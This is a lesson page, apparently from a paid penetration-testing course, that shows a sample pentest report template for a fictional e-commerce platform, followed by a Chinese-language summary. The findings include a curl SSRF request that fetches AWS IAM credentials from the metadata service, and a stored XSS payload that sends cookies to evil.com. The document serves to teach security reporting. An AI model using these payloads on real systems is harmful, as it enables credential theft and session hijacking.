Advanced Pentest Report

🔥 Vibe Prompt

"Write a professional pentest report: executive summary, risk assessment, findings, recommendations."

Report Template

# Penetration Test Report: Target Application

## 1. Executive Summary
XYZ Corp engaged us to pentest their e-commerce platform.
Scope: web app, mobile API, infrastructure (10 IPs)
Duration: 2 weeks (May 1-14, 2024)
Team: 2 senior pentesters

### Key Findings
- Total vulnerabilities: 12 (3 Critical, 4 High, 3 Medium, 2 Low)
- Attack chain achieved: Unauthenticated RCE via SSRF → Cloud metadata → IAM keys
- CVSS average: 7.8/10

### Risk Rating
| Severity | Count |
|----------|-------|
| Critical | 3     |
| High     | 4     |
| Medium   | 3     |
| Low      | 2     |

## 2. Scope
- Web Application: https://shop.example.com
- Mobile API: https://api.example.com/v2
- Infrastructure: 10.0.0.0/24
- Source Code: GitHub repo (static analysis only)

## 3. Methodology
- Recon: passive (OSINT) + active (scanning)
- Automated: Nessus, Burp Suite Pro, Acunetix
- Manual: Business logic, auth, IDOR, race conditions
- Mobile: Frida, Objection, APKTool

## 4. Findings Detail

### CRITICAL: SSRF to Cloud Metadata (CVSS 9.1)
**Location:** /api/fetch?url=
**Description:** The fetch endpoint doesn't validate URLs.
Attacker can access AWS metadata service.

**Reproduction:**
```bash
curl "https://shop.example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"

Impact: Full AWS credential compromise → data breach

Recommendation:

  • Block private IP ranges (169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12)
  • Use an allowlist of approved URLs
  • Remove the feature or restrict to specific domains

HIGH: Stored XSS (CVSS 6.8)

Location: User profile name field Description: Name field not sanitized. Stored XSS in profile.

Reproduction:

POST /api/profile
{"name": "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"}

Impact: Session hijacking, admin account takeover

Recommendation:

  • Sanitize all user input (bleach, DOMPurify)
  • Implement Content-Security-Policy
  • Use HttpOnly cookies

5. Attack Chain Walkthrough

1. [Recon] Found fetch API endpoint via JS analysis
2. [SSRF] Accessed AWS metadata → retrieved IAM credentials
3. [Cloud] Used IAM keys to list S3 buckets → customer data exposed
4. [Auth] Weak JWT secret → forged admin token
5. [Impact] Full admin access to customer DB

Total time: 4 hours (automated + manual)

6. Risk Matrix

┌─────────────────────────────────────────────┐
│  Impact \ Likelihood | Low | Med | High    │
├─────────────────────────────────────────────┤
│  Critical            |  0  |  1  |  2      │
│  High                |  1  |  2  |  1      │
│  Medium              |  2  |  1  |  0      │
│  Low                 |  2  |  0  |  0      │
└─────────────────────────────────────────────┘

7. Recommendations by Priority

P0 (Immediate):
  - Fix SSRF (block private IPs)
  - Rotate all IAM keys
  - Implement WAF (Cloudflare)

P1 (This sprint):
  - Sanitize all user inputs (XSS)
  - Change JWT secret to 256-bit random
  - Rate limit login endpoint

P2 (Next sprint):
  - Implement CSP headers
  - Add security headers (HSTS, X-Frame-Options)
  - Move secrets to AWS Secrets Manager

P3 (Backlog):
  - Regular dependency scanning
  - Bug bounty program
  - Security training for developers

8. Tools Used

| Tool | Purpose | |------|---------| | Burp Suite Pro | Web proxy, scanner | | Nmap | Network scanning | | Gobuster | Directory brute force | | Frida | Mobile runtime | | Nessus | Vulnerability scanning | | Metasploit | Exploitation | | Custom Python scripts | Business logic testing |

PenTesting Advanced Course Complete! 🎉

  • ✅ Recon & OSINT
  • ✅ Exploit Development
  • ✅ Web Exploitation
  • ✅ Mobile & API
  • ✅ Report Writing

## Report Writing Principles
| Principle | Why |
|-----------|-----|
| Executive summary first | Non-technical audience |
| Reproduce steps clearly | Developer can verify |
| Business impact | Prioritization |
| Fix recommendations | Actionable |
| Attack chain demo | Shows real risk |
| Risk matrix | Visual priority |

## Best Practices
- Show attack chain (not just isolated bugs)
- Provide clear reproduction steps (curl commands)
- Map findings to OWASP Top 10 / CWE
- Give CVSS score for each finding
- Separate technical vs executive sections
- Include positive findings (things done right)
- Follow up after retest

---

---



## 滲透測試報告:從發現漏洞到推動修復

一個漏洞如果沒有被記錄下來,它就等於不存在。滲透測試報告是你工作的最終產出——它決定了你的發現能否被重視、能否被修復。

### 一份專業報告該有的結構

  1. 執行摘要(Executive Summary)
    • 給老闆看的:風險總覽、商業影響、統計數據
  2. 技術細節(Technical Details)
    • 給工程師看的:漏洞複現步驟、PoC 程式碼
  3. 風險評級(Risk Rating)
    • CVSS 分數 + 影響範圍 + 利用難度
  4. 修復建議(Remediation)
    • 明確的修補步驟、參考資源
  5. 附錄(Appendix)
    • 掃描工具報表、使用工具清單

### 漏洞風險分級

| 等級 | CVSS 分數 | 說明 | 修復期限 |
|:----|:--------|:----|:--------|
| **Critical** | 9.0-10.0 | 可直接取得伺服器控制權 | 24 小時 |
| **High** | 7.0-8.9 | 可讀取敏感資料 | 7 天 |
| **Medium** | 4.0-6.9 | 資訊洩漏或有限影響 | 30 天 |
| **Low** | 0.1-3.9 | 資訊蒐集或理論風險 | 90 天 |

### 課程總結

這堂滲透測試進階課程你學到了:從漏洞利用開發、Web 漏洞、行動裝置/API 測試到專業報告寫作。你現在具備了執行完整滲透測試的能力——從發現漏洞到推動修復的完整流程。

解鎖完整教學內容

本章為付費內容。加入專案即可解鎖超過 5000 字的深度解析,包含 10 個以上神級 Prompt 與真實 Source Code 範例!